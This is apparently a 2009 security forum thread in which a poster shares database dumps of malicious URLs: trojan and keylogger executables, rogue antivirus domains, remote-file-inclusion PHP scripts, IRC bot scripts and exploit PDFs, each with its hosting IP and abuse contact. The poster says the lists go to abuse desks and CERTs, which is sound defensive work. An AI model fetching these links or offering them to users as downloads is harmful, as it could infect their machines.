| 2009-06-30 14:01:49 | avira | TR/Crypt.ZPACK.Gen | 65.61.216.163 | abuse@in2net.com | CA | ARIN | IN2NETWORK | http://healthylifehypnotherapy.com/flashcodecinstall_13_31.exe |
| 2009-06-30 14:01:49 | avira | ADSPY/DiscoveryLive.A | 64.22.66.202 | abuse@gnax.net | US | ARIN | GNAXNET | http://mdl.stuffplug.com/MDL_1.3.0300.exe |
| 2009-06-30 14:01:49 | undef | unknown_SetupPoker_46c620.exe | 69.90.74.226 | abuse@peer1.net | US | ARIN | PEER1-BLK-08 | http://banner.titanpoker.com/cgi-bin/SetupPoker.exe |
| 2009-06-30 14:01:49 | avira | TR/Agent.82944 | 67.210.127.56 | hostmaster@lunarpages.com | US | ARIN | ADD2NET-DOT-COM | http://boutique-world.com/watch.exe |
| 2009-06-30 14:01:49 | undef | unknown_$INSTDIR/DivxPlayer.exe | 207.218.211.242 | abuse@ev1servers.net | US | ARIN | EVRY-BLK-1 | http://divx-player.ivefound.com/./download/DivxPlayerSetup.exe |
| 2009-06-30 14:01:49 | undef | unknown_$SHELc[17]/360safe/Shield/Install/360sandbox.exe | 60.170.241.20 | wanglinlin2@anhuitelecom.com | CN | APNIC | CHINANET-AH | http://down.360safe.com/se/360se_1.3.exe |
| 2009-06-30 14:01:49 | undef | unknown_exe | 221.203.179.20 | abuse@online.ln.cn | CN | APNIC | CNCGROUP-LN | http://down.sandai.net/Thunder5.8.7.625.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://palsol.com/downloads/spyrem_setup.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 64.208.226.93 | abuse@gblx.net | US | ARIN | GBLX-11A | http://privacy-care.com/bin/SpywareExpertInstall.exe |
| 2009-06-30 14:01:50 | avira | TR/Dldr.Agent.yhp | 217.76.156.92 | abuse@tpnet.pl | PL | RIPE | NET-PIENSASOLUTIONS-2 | http://sapacontenedores.com/get_flash_update.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 70.38.54.20 | abuse@noc.privatedns.com | CA | ARIN | IWEB-BLK-05 | http://spyremover.com/downloads/SpyRemoverSetup.exe |
| 2009-06-30 14:01:50 | avira | TR/Crypt.ZPACK.Gen | 62.149.174.149 | hostmaster@technorail.com | IT | RIPE | TECHNORAIL-NET | http://www.artistinove.it/shok_video.exe |
| 2009-06-30 14:01:50 | avira | BDS/Hupigon.Gen | 125.65.112.10 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SC | http://www.js0575.com/ac/2.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 75.125.152.58 | abuse@theplanet.com | US | ARIN | EVRY-BLK-17 | http://www.macrovirus.com/setup.exe |
| 2009-06-30 14:01:50 | avira | TR/Crypt.ZPACK.Gen | 61.139.126.14 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SC | http://www.nicovedeo.com/watch/ma.exe |
| 2009-06-30 14:01:50 | avira | DR/KeyLog.32 | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://www.palsol.com/downloads/v3/Setup_CSS_Shareware.exe |
| 2009-06-30 14:01:50 | avira | DR/KeyLog.32.1 | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://www.palsol.com/downloads/v3/Setup_PCS_Shareware.exe |
| 2009-06-30 14:01:50 | avira | ADSPY/Softomat.E.10 | 64.111.196.124 | abuse@isprime.com | US | ARIN | ISPRIME-ARIN-2 | http://www.peakclick.com/toolbar/1/toolbar.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 64.208.226.93 | abuse@gblx.net | US | ARIN | GBLX-11A | http://www.privacy-care.com/bin/SpywareExpertInstall.exe |
| 2009-07-01 17:53:46 | undef | unknown_exe | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://kodenadaqequnul2.googlegroups.com/web/a289743kjhfkjhkj3hkj.swf?gda=q-N2NUsAAACuGiGjtYknYpnLJ9JOD6VhQaFUmokO1f_8pAMqUmUp_d812b7JYV_uUBJlRIiigwRbYpQIvmf_l9f_E8k9I2rxBkXa90K8pT5MNmkW1w_4BQ |
| 2009-07-06 19:04:09 | undef | unknown_exe | 82.103.141.146 | abuse@easyspeedy.com | DK | RIPE | EASYSPEEDY-NETWORK | http://www.ymmoo.net/setup_ymmoo.exe |
| 2009-07-06 23:59:18 | avira | TR/Dropper.Gen | 66.71.244.130 | wnoc@wiresix.com | US | ARIN | WIRESIX | http://www.hotlinkfiles.com/files/2655943_ce2wp/fotos_Album.exe]fotos_Album.exe |
| 2009-07-08 15:01:11 | avira | TR/Dropper.Gen | 210.51.181.129 | cncipaddr@china-netcom.com | CN | APNIC | CNC-BJ-IDC | http://youtube-adult.name/id_0122.exe |
| 2009-07-09 19:57:17 | avira | TR/Dropper.Gen | 66.71.244.130 | wnoc@wiresix.com | US | ARIN | WIRESIX | http://www.hotlinkfiles.com/files/2660772_bgpzg/curriculum.scr |
| 2009-07-11 19:58:49 | avira | DR/PSW.Zapchast.zwrc.54 | 62.77.192.160 | abuse@invitel.net | HU | RIPE | VTH | http://62.77.192.160/~webuser/postcard.jpg.exe |
| 2009-07-11 22:58:33 | avira | TR/Crypt.ZPACK.Gen | 61.139.126.91 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SC | http://www.skywebsv.com/play/cer.exe |
| 2009-07-14 09:57:02 | avira | TR/Buzus.bntm | 212.117.166.78 | abuse@root.lu | LU | RIPE | SERVER-LU | http://212.117.166.78/ausverkauf.exe |
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
34 rows in set (0.45 sec)
-
hi
these have sometimes javascript or somethings else ... but avira, clamav and trendmicro are currenty not reporting any malware/fraud on this url's
I think they should be examined deeper... i post these here FYI
-- gerhard
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
| timestamp | virusname | review | email | country | source | netname | url |
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2009-05-18 15:55:08 | unknown_html | 74.125.39.191 | arin-contact@google.com | US | ARIN | GOOGLE | http://globalhackerstools.blogspot.com/2008/09/all-in-one-ultra-hacker-2008-new-tools_27.html |
| 2009-06-30 14:01:50 | unknown_html | 88.208.17.116 | phone: +38 063 188 2888 | NL | RIPE | HALDEX-NET | http://www2.porntube-vip.com/watch//downloads/FlashPlayerH264Ext.exe |
| 2009-06-30 14:01:50 | unknown_html | 218.85.132.243 | fjnic@fjdcb.fz.fj.cn | CN | APNIC | CHINANET-FJ | http://www.yljsx.gov.cn/images/calc.exe |
| 2009-07-01 17:53:46 | unknown_html | 80.74.145.118 | abuse@metanet.ch | CH | RIPE | METANET | http://entre-lacs.ch/1.html |
| 2009-07-01 17:53:46 | unknown_html | 80.109.240.75 | hostmaster@chello.at | AT | RIPE | AT-TELEKABEL-20010719 | http://members.chello.hu/gyenes.attila5/1.html |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://podarki-rnd.by.ru/images/1/2/3/4/buy.html |
| 2009-07-01 17:53:46 | unknown_html | 209.59.166.237 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-2 | http://www.pcngpu.com.br/1.html |
| 2009-07-01 17:53:46 | unknown_html | 80.74.156.168 | abuse@metanet.ch | CH | RIPE | METANET | http://grandpin.ch/1.html |
| 2009-07-01 17:53:46 | unknown_html | 72.167.232.65 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://nogglemedia.com/1.html |
| 2009-07-01 17:53:46 | unknown_html | 66.96.145.104 | kwitt@bizland-inc.com | US | ARIN | BIZLAND-FC01 | http://ebook-friend.com/pwqswldfkre.html?UCyHhvJCU |
| 2009-07-01 17:53:46 | unknown_html | 61.19.250.192 | suchok@cat.net.th | TH | APNIC | CAT | http://saratta.com/images/1/2/3/4/buy.html |
| 2009-07-01 17:53:46 | unknown_html | 72.9.249.146 | abuse@gnax.net | US | ARIN | GNAXNET | http://fairwheelbikes.com/njfdhfiejowas.html?CgbNLg |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://cookzidigo1984.googlegroups.com/web/Index5.html?gda=cA4xsj4AAAAUrONGIfshKYzP_pPasy2HS9sH-CYRB06_bMAh3oeDS07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 72.167.232.230 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://tudatosbiztonsag.com/frew9riuewods.html?CQOuNtk |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://parkernifeja1980.googlegroups.com/web/Index5.html?gda=XIDTdj4AAABVan8diZdyODBkZ07ksmLZSduHNVPn0lwlkdSFb2uh_k7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://millerlojifi1981.googlegroups.com/web/Index5.html?gda=UKjnkD4AAAAUZbPPzR8lan7ls97bTuePaMD_fMZblYsPxSXEdzJi0E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 90.156.153.106 | abuse@masterhost.ru | RU | RIPE | MASTERHOST | http://vippodarki.su/images/1/2/3/4/buy.html |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://robinsonnyqely1978.googlegroups.com/web/Index5.html?gda=v83xTT4AAABaW0SLoLlP-nQ40g4dkyaUAK5RJIrd9MaFPSL3ekVz8k7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/UF6VBDVCTTTIAIH5UJTFTDZXJM?eid=AykUIDBmkHQN2blLw7WjbLTls27AdNGhQuoxSVmZFkr9VSHHYw |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/2XMNQRSXYVGNUUO2RWJGDRPAKM?eid=LKveJ5xgzS_IOJnysoFvbz2O6.KN84UJkq8Y7EAwQoVpm7RVzw |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/IWJV4HSIWJO65P2ARC3QJEZU4E?eid=xwnLgaM2y3zG.Wrls4skh4ujc7NZ.b8bIkrpe1eviKv_VaZwVQ |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/TTIOM3EBKPOJQOH4IEOP6F6KHI?eid=6CCDB7lnn37pLAU3CbeBAHhSEMZlTo5NISCBScNcduZP8ktisQ |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/UD75QFVUPKIZJEKD36B5YJRFII?eid=AS0CmkQxmXQP_9LXWUx_rqrQbbdYq4JEOvQtBklg2YiNHml2ow |
| 2009-07-01 17:53:46 | unknown_html | 201.33.17.121 | contato@datacorpore.com.br | BR | LACNIC | 008.210.265/0001-26 | http://projetomaosdadas.org/moewkplsa.html?kBmLfuiPc |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?EqNuQanVj |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?ohhUnZs |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?QwVpihZg |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57 | abuse@masterhost.ru | RU | RIPE | MASTERHOST-COLOCATION | http://studyfoundry.by.ru/gfekowkfeosd.html?7H1BB |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://hughesconufo1986.googlegroups.com/web/Index5.html?gda=0I6akz4AAABzJoncJQYrPGjbeasFFmdbRyjR8pcLw5RY6hAKFCZRj07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://howarddukyji1977.googlegroups.com/web/Index5.html?gda=y6MJej4AAABv1pS0tx1d9OqjhdsrWIIu-LNb24h9VsKL8WbSeUKLSU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://clarkqodubo1987.googlegroups.com/web/Index5.html?gda=3_3R_j4AAACs6KG2Ckc1FIch73EAo2Sah9vxzBS9DAyUfuOQJ518P07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://powelljeruda1985.googlegroups.com/web/Index5.html?gda=iwDitz4AAADiXhM7N9HjtaAgymI4Vc40l-L-jzasWj--FgC_pFWbFE7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://leeteqoku1984.googlegroups.com/web/Index5.html?gda=ACpmBz4AAACoXxfdVTUpZahJ3X89TepfoKRVV5C9d54Y9y3J06kds07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://evanslucoce1985.googlegroups.com/web/Index5.html?gda=uNuUkz4AAABx_3PjzrnXA5jh0yfbkGiCL60X8D5oOnNH6BMQbCWcrk7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://fosterhyzody1987.googlegroups.com/web/Index5.html?gda=_pMy0T4AAAB7IfldT9E8kXR6OvEeUYfWhapeTkXFL2vDREaGX4eyP07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://cooperwypunu1987.googlegroups.com/web/Index5.html?gda=1FB-WT4AAACj7WHp7os86Au9u4NuiJDlySdCQLMlV9HlwEZxtD9DAk7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/5X7H5Q2X5ZZMFBZHVE4C74ENJE?eid=n4MAr6Vkn3o_1GnTbDocHBqcwXcF8H7DaMytJ1yG9TeHxVXnCg |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://longdovape1977.googlegroups.com/web/Index5.html?gda=jsx7mj4AAAAVd6afZvykctiFsUahpWoKans2ZG_0R1guYsdEP5iVVU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://morrismipanu1978.googlegroups.com/web/Index5.html?gda=N58hSz4AAACIb0LGJp38fhqPSrP2G1ZuMdJG8dMFNK7g-KV0OKPR807SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://bellrufovi1984.googlegroups.com/web/Index5.html?gda=xxx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://bakersypypy1984.googlegroups.com/web/Index5.html?gda=47DJoz4AAACbhW_MZTUrT9-QsVWWJ1ZyvrWH07qmMmlNlOt8tukq5E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 94.198.98.17 | phone: +39 3297488302 | IT | RIPE | SUPERNOVA-NET | http://www.postapop3.netsons.org/po3.html |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://garciacufiti1983.googlegroups.com/web/Index5.html?gda=OeeYdz4AAABIeTRSouOs75JjnDXHCwADKTrIBnTVU-2vLl4ZTUOY5E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://collinsdahyso1984.googlegroups.com/web/Index5.html?gda=UdfB7T4AAABUsvVsyDye1ForhJuVZb0cEHYyCzh6VTQc_UQ0Ah6Qc07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/JJ2GSDOYO76CMLG6ABAZFFUJ74?eid=rB0o1ahnynVJOwQvjf4x3edUCf3B.jj3gBf2_1ilBcG_QSA.LA |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://gonzalescatotu1980.googlegroups.com/web/Index5.html?gda=cBF7lz4AAAARaEn3MxokYleE6Hyh4HtUca9u6gwhXeLk4pJUM2UELU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://belldenyhe1985.googlegroups.com/web/Index5.html?gda=OeMRPz4AAAB_pc5n6AdBZ8kMenK1w222XRWzDTlLBoPitQCAWlwmUU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 216.108.235.39 | noc@premianet.com | US | ARIN | PREMIANET | http://bude.comoj.com/news.html?bshKTPnjLdI |
| 2009-07-01 17:53:46 | unknown_html | 216.108.235.73 | noc@premianet.com | US | ARIN | PREMIANET | http://nettecicek.comli.com/news.html?TWtzUJT |
| 2009-07-01 17:53:46 | unknown_html | 97.74.144.107 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://daminiartisans.com/qwality.html?jrmoghclti |
| 2009-07-01 17:53:46 | unknown_html | 194.170.187.32 | abuse@emirates.net.ae | AE | RIPE | EXCHANGE-EMIRNET | http://www.panache.ae/qwality.html?UnaavJfswLfmcBP |
| 2009-07-01 17:53:46 | unknown_html | 168.143.174.29 | abuse@ntt.net | US | ARIN | NTTA-168-143 | http://bit.ly/JDotw |
| 2009-07-01 17:53:47 | unknown_html | 72.167.232.202 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.pinkgingershop.com/images/1/2/3/4/buy.html |
| 2009-07-01 17:53:47 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/MZKZ4EJAQDE4QD7CWXDRDMKSJY?eid=KxQqejs3n3jZokVUNcRK5zSW4lDFBvetF8eu0PPTnvcgvE2IAg |
| 2009-07-05 23:57:26 | unknown_html | 211.244.22.30 | kidc@hanbiro.com | KR | APNIC | KRNIC-KR | http://softwarekeysmartphones.com/Corel.php |
| 2009-07-10 14:05:44 | unknown_html | 92.241.176.188 | abuse@netplace.ru | RU | RIPE | NETPLACE | http://advanced-virus-remover2009.com/terms.php??code=00000000 |
| 2009-07-10 14:05:44 | unknown_html | 88.198.105.145 | abuse@hetzner.de | DE | RIPE | DE-HETZNER-20051227 | http://antiviruslicensepurchase.com/en.gif |
| 2009-07-10 14:05:45 | unknown_html | 87.118.86.125 | abuse@keyweb.de | DE | RIPE | DE-KEYWEB-IV | http://goldtraf.su/showbanner.php?kod=920098&site=www.test.ru |
| 2009-07-10 14:05:45 | unknown_html | 202.101.42.130 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SH | http://tong-ji.com/sj19.htm |
| 2009-07-10 14:05:45 | unknown_html | 202.101.42.130 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SH | http://tong-ji.com/index.htm |
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
60 rows in set (0.43 sec)
-
see also http://support.clean-mx.de/clean-mx/viruses?response=alive (http://support.clean-mx.de/clean-mx/viruses?response=alive)
Hi Gerhard,
interesting database. I didn't know it.
-
Hi
we maintain three databases
phishing-> http://support.clean-mx.de/clean-mx/phishing.php?sort=id%20desc&response=alive (http://support.clean-mx.de/clean-mx/phishing.php?sort=id%20desc&response=alive)
abused servers/platforms -> http://support.clean-mx.de/clean-mx/portals.php?sort=id%20desc&response=alive (http://support.clean-mx.de/clean-mx/portals.php?sort=id%20desc&respnse=alive)
and malware -> http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive (http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive)
We notify network abuse contacts and national cert's to close down these activities....
I would be fine to get a constant feed from malwaredomainlist....
update:
you may query only for currenty still active malwaredomainlist url's with:
http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive&sub=sub4 (http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive&sub=sub4)
if you omitt &response=alive, you will get all ....
-- gerhard
-
another bunch.. including RFI's
xml:
http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=xml (http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=xml)
csv:
http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=csv (http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=csv)
-- gerhard
-
Sites used by the braviax/brastk family to distribute rogues
Home-av-2010.com
Home-av2010.com
Homeav2010.com
Home-anti-virus-2010.com
Homeantivirus2010.com
Home-antivirus2010.com
Homeanti-virus-2010.com
Home-anti-virus2010.com
Home-anti-virus-2010.com
Homeanti-virus2010.com
Homeantivirus-2010.com
Pc-security09.com
Pcsecurity09.com
Pcsecurity-09.com
-
some malware
+----------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname | review | email | country | source | netname | url |
+----------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2009-07-19 17:56:40 | undef | unknown_html | 94.23.1.47 | abuse@ovh.net | FR | RIPE | OVH | http://www.lestoquesdeladalle.com/images/download stub32i.exe |
| 2009-07-18 23:57:53 | undef | unknown_html_RFI_php | 80.237.132.88 | net-abuse@hosteurope.de | DE | RIPE | HE-SH-CGN-NET | http://www.silencio-dinklage.de//redaxo/include/classes/id3.txt |
| 2009-07-18 23:57:53 | avira | PHP/BDS/H.C | 194.135.105.25 | ip-reg@ripn.net | RU | RIPE | RU-RELCOM-194-135 | http://www.gosstroy.com/images/kampret.jpg |
| 2009-07-18 23:57:53 | avira | PHP/Pbot.A | 89.111.176.103 | abuse@hc.ru | RU | RIPE | CENTROHOST-NET | http://www.guardian-psj.ru/assets/media/X |
| 2009-07-18 23:57:53 | undef | unknown_html_RFI_php | 81.12.13.152 | mzargar@yahoo.com | IR | RIPE | SINET-SHARIATI | http://www.iran-eschool.com//images/shirohige/fxid.txt |
| 2009-07-18 23:57:53 | avira | SPR/PHP.ID | 195.117.130.224 | | PL | RIPE | FIRMA-MUCHA-KRZYSZTOF-MUCHA | http://www.ksi-klasa.pl//104/Rosid.txt |
| 2009-07-18 23:57:50 | undef | unknown_html_RFI_php | 89.96.184.80 | abuse@fastweb.it | IT | RIPE | FASTWEB-LINKEM | http://www.acb.bs.it/fad/test.txt |
| 2009-07-18 23:57:49 | undef | unknown_html_RFI_php | 82.197.131.52 | abuse@attractsoft.com | DE | RIPE | LNC-ATTRACTSOFT-GMBH | http://segurancabradesco.awardspace.com/cmd_inc.htm |
| 2009-07-18 23:57:48 | avira | SPR/PHP.ID | 83.137.192.222 | bas@superior.nl | NL | RIPE | SUPERIOR-NL | http://partycentrumdemolen.nl//mambots/system/osyid.txt |
| 2009-07-18 19:39:18 | avira | EXP/Pidief.UA | 195.88.191.46 | cardiro@cardiro.org | RU | RIPE | BIGNESS-GROUP-NET | http://yawxowaj.cn/22/oldBelow.pdf |
| 2009-07-18 19:39:18 | undef | unknown_exe | 85.17.162.217 | abuse@leaseweb.com | NL | RIPE | LEASEWEB | http://v-i-e-w.net/xrun.tmp |
| 2009-07-18 19:39:18 | avira | TR/Crypt.ZPACK.Gen | 72.26.101.150 | dnsadmin@alchemy.net | US | ARIN | ALCH | http://installmoney.com/svchost.exe |
| 2009-07-18 19:39:18 | avira | TR/Dropper.Gen | 74.54.241.100 | abuse@theplanet.com | US | ARIN | NETBLK-THEPLANET-BLK-14 | http://theinstalls.com/files/uprograms/dailybucks/dailybucks_install.exe |
| 2009-07-18 19:39:18 | undef | unknown_exe | 63.134.244.77 | abuse@crystaltech.com | US | ARIN | CRYSTALTECH-BLK-6 | http://dapda.cn/setup.exe |
| 2009-07-18 19:39:18 | undef | unknown_exe | 74.54.241.100 | abuse@theplanet.com | US | ARIN | NETBLK-THEPLANET-BLK-14 | http://theinstalls.com/files/uprograms/dailybucks/install.48349.exe |
| 2009-07-18 19:39:18 | avira | TR/Dropper.Gen | 212.117.174.14 | abuse@root.lu | LU | RIPE | SERVER-LU | http://212.117.174.14/installnew2.exe |
| 2009-07-18 19:39:18 | clamav | PHP.Bot | 66.7.213.211 | abuse@dimenoc.com | US | ARIN | DIMECNET | http://www.intel9.com.br/ircbot/Q.txt |
| 2009-07-18 03:03:10 | avira | BDS/Agent.1260.A | 67.186.51.77 | abuse@comcast.net | US | ARIN | ATT-COMCAST | http://c-67-186-51-77.hsd1.oh.comcast.net/card.exe |
| 2009-07-17 22:01:50 | undef | unknown_html_RFI_php | 124.0.159.141 | ip-tech@sknetworks.co.kr | KR | APNIC | SKNETWORKS | http://www.seokrim.ms.kr//data/shirohige/zfxid.txt |
| 2009-07-17 22:01:50 | clamav | PHP.Id-5 | 80.93.54.68 | abuse@peterhost.ru | RU | RIPE | PETERHOST-PITER | http://www.1remont.ru/readme.txt |
| 2009-07-17 22:01:40 | avira | DR/PSW.Zapchast.zwrc.54 | 193.218.160.67 | waqar@gigo.co.uk | GB | RIPE | GIGOSYSTEM | http://193.218.160.67/~PlcmSpIp/postcard.jpg.exe |
| 2009-07-17 17:02:42 | avira | DR/PSW.Zapchast.zwrc.116 | 210.188.255.10 | abuse@odn.ad.jp | JP | APNIC | JPNIC-NET-JP | http://210.188.255.10/~yamazaki/MichaelJackson.jpg.exe |
| 2009-07-16 23:06:00 | undef | unknown_exe | 69.174.115.139 | abuse@comcast.net | US | ARIN | COMCAST-ADEL-69-174-0-0 | http://www.24-7agtv.com/hotshotsvideoproductions.com/templates/ja_rochea/scripts/ja.script.js |
| 2009-07-16 23:04:53 | undef | unknown_exe | 220.248.172.39 | abuse@cnc-noc.net | CN | APNIC | CNC-Hunan-province | http://win3821.com/SmartDownload.exe |
| 2009-07-16 17:46:11 | avira | EXP/PHP.E | 201.144.241.226 | abuse@uninet.net.mx | MX | LACNIC | MX-REUN-LACNIC | http://www.centralfilms.net/cgi/bots/red.txt |
| 2009-07-16 17:45:45 | clamav | PHP.Id | 221.143.46.104 | abuse@hanaro.com | KR | APNIC | HANANET | http://impeel.com/impeel/wizard/r0x-id.txt |
| 2009-07-16 03:56:24 | undef | unknown_exe | 213.165.82.102 | abuse@oneandone.net | DE | RIPE | SCHLUND-CUSTOMERS | http://www.lux-luxury.com/templates/ja_teline_ii/js/ja.script.js |
| 2009-07-16 03:56:03 | avira | TR/Spy.Banker.BAC.1 | 194.0.252.241 | abuse@vooservers.com | GB | RIPE | vooservers | http://194.0.252.241/.../Bradescompleto.scr |
